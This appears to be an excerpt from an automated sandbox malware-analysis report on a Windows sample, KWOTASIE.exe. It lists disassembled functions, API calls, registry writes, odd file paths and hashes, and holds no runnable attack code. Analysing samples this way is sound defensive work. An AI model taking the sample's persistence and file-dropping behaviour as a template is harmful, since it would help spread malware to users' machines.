Part of subcall function 004052B0: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
Part of subcall function 004052B0: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00403233), ref: 0040530B
Part of subcall function 004052B0: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\), ref: 0040531D
Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B

Strings

C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct, xrefs: 00401821, 0040183F
frerhunde\bordeauxvske\negroization, xrefs: 00401835, 00401851
Unknownness, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Innoxious\olivilin, xrefs: 0040179E

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Innoxious\olivilin$C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct$Unknownness$frerhunde\bordeauxvske\negroization
API String ID: 1941528284-23979270
Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D

Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
lstrlenW.KERNEL32(00403233,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00403233), ref: 0040530B
SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\), ref: 0040531D
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B

Strings

Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\, xrefs: 004052D1, 004052E1, 004052E7, 0040530A, 00405316

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\
API String ID: 2531174081-2091390317
Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68

Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
wsprintfW.USER32 ref: 00406608
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C

Strings

\, xrefs: 004065DE
UXTHEME, xrefs: 004065BF
%s%S.dll, xrefs: 00406602

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8

Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040315B
GetTickCount.KERNEL32 ref: 004031DC
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403209
wsprintfW.USER32 ref: 0040321C

Strings

... %d%%, xrefs: 00403216

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9

Function 0040577F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
GetLastError.KERNEL32 ref: 004057D6
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
GetLastError.KERNEL32 ref: 004057F5

Strings

C:\Users\user\Desktop, xrefs: 0040577F

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-1246513382
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9

Function 00405D6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405D8B
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\KWOTASIE.exe",0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403589), ref: 00405DA6

Strings

nsa, xrefs: 00405D7A
"C:\Users\user\Desktop\KWOTASIE.exe", xrefs: 00405D6D
C:\Users\user\AppData\Local\Temp\, xrefs: 00405D72, 00405D76

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\KWOTASIE.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1988354106
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64

Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,00000023,00000011,00000002), ref: 00402429
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,00000000,00000011,00000002), ref: 00402469
RegCloseKey.ADVAPI32(?,?,?,C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,00000000,00000011,00000002), ref: 00402551

Strings

C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct, xrefs: 0040241A, 0040243F, 00402453, 0040245E

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct
API String ID: 2655323295-2390424612
Opcode ID: 0473d0a5ea99ee64442fe898aa5f55d204352a87270dccf6c48c871937c9d035
Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
Opcode Fuzzy Hash: 0473d0a5ea99ee64442fe898aa5f55d204352a87270dccf6c48c871937c9d035
Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58

Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
RegCloseKey.ADVAPI32(?), ref: 00402D98
RegCloseKey.ADVAPI32(?), ref: 00402DB9

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405BC8: CharNextW.USER32(?,?,C:\,?,00405C3C,C:\,C:\,?,?,75923420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405BD6
Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Innoxious\olivilin,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Innoxious\olivilin, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Innoxious\olivilin
API String ID: 1892508949-136261422
Opcode ID: 3620efb9bc51b013d0db565b85ce8851868fe216be8260567c1b6201130560c4
Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
Opcode Fuzzy Hash: 3620efb9bc51b013d0db565b85ce8851868fe216be8260567c1b6201130560c4
Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E

Function 00405C25 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259

Part of subcall function 00405BC8: CharNextW.USER32(?,?,C:\,?,00405C3C,C:\,C:\,?,?,75923420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405BD6
Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3

lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,75923420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C7E
GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,75923420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 00405C8E

Strings

C:\, xrefs: 00405C2B, 00405C30, 00405C36, 00405C77, 00405C7D, 00405C85, 00405C8D

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: c400ef1d1e731d117cbda643fc4ffe8eac790fafe02a6f7d9a7793559b5b74a4
Instruction ID: 8cd04150762c6b8d6a28599447491585beeb2d0428c1c24898b3a9decc440bb2
Opcode Fuzzy Hash: c400ef1d1e731d117cbda643fc4ffe8eac790fafe02a6f7d9a7793559b5b74a4
Instruction Fuzzy Hash: 0BF0F42910DF1115E226323A1D0AEAF1555CE83364B4E053FF851B22C5DE3C9A538DAE

Function 0040611A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Remove folder: ,?,?,0040638E,80000002), ref: 00406160
RegCloseKey.KERNELBASE(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,Remove folder: ,Remove folder: ,Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\), ref: 0040616B

Strings

Remove folder: , xrefs: 00406121

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

